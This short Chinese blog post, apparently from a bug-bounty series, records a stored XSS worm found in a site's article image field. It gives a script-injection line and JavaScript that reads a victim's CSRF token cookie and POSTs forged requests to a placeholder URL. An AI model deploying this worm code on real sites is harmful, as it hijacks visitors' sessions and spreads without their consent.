7. xss蠕虫


layout: post
title: 7. xss蠕虫
category: SRC
tags: SRC
keywords: SRC,XSS

前言

该篇记录为记录实际的src过程第7篇小文章,内容为某网站的xss蠕虫。

XSS特征

触发点惊奇的出现在发送文章中,插入图片的地方可以执行js,由于是发布文章(真的没有想到现在还能这种洞,所以说不能自以为然),所以可以造成蠕虫。如下漏洞和代码都是队友林百万
所为,之前没有用过,特此记录一下。可蠕虫的存储型xss,属于高危害。

蠕虫代码

可以直接插入<script/src=//your.js>

内容


//页面存在csrf_token,可以直接利用xss获取cookie中的token值

 function getCookie(name) {
        var strcookie = document.cookie;//获取cookie字符串
        var arrcookie = strcookie.split("; ");//分割
        //遍历匹配
        for (var i = 0; i < arrcookie.length; i++) {
            var arr = arrcookie[i].split("=");
            if (arr[0] == name) {
                return arr[1];
            }
        }
        return "";
    };

    var params = {你要发送的数据包};
    params['csrftoken'] = getCookie("csrftoken");
    url = "https://xxxx";
    fetch(url, {
        method: 'POST',
        mode: 'cors',
        headers: {
            'Content-Type': 'application/json'
        },
        body: JSON.stringify(params)
    });

后话

xxxx

猜你喜欢

转载自blog.csdn.net/xiru9972/article/details/112760271